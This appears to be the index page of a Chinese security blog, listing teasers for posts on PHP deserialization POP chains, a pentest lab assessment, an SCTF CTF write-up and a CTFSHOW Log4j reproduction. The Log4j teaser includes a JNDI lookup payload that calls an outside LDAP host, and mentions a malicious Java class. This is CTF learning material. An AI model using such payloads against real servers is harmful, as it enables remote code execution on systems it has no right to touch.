H3h3QAQの博客
04
16
03
06
POP链初探 POP链初探
POP链基础Author:H3h3QAQ 之前我写了一篇PHP反序列化的基础文章 接下来我打算记录一下我的POP链构造学习过程 首先我们需要一些了解一些基础知识 一、POP和POP链的定义1、什么是POP面向属性编程(Property-Or
2022-03-06
01
10
【萌新向】渗透测试靶场考核 【萌新向】渗透测试靶场考核
最近年末了,单位有了渗透的考核 对于我这个几乎没有玩过内网的同学简直是非常难过! 靶场搭建再了单位的一台Thinkpad上,但是!路由器经常会炸,在后面我会解释一下为啥提前说一下这个 由于时间短,我没有完成整个渗透的过程,就简单记录一下渗透
2022-01-10
08
12
28
2021SCTF-Loginme 2021SCTF-Loginme
最近也是刚刚放假,比较忙,就看了看这个SCTF 比赛快到尾声的时候才抽出空来看看题 按照惯例,肯定是要看看分最少的题 这道题被我看中了,我打算研究一下这个题 附件是一份源码,而且是go语言的源码 我们来看一看 题中源码给了middlewa
2021-12-28
10
CTFSHOWLog4j复现 CTFSHOWLog4j复现
今天上午刚刚看完这个洞,自己复现了一下,晚上就看到了上题正好打一下玩玩 多明显的输入框,嘿嘿嘿 这不得来一个 ${jndi:ldap://dnslog.com/exp} (bushi 0x01 准备工作首先准备好恶意Java类 pub
2021-12-10
1 / 4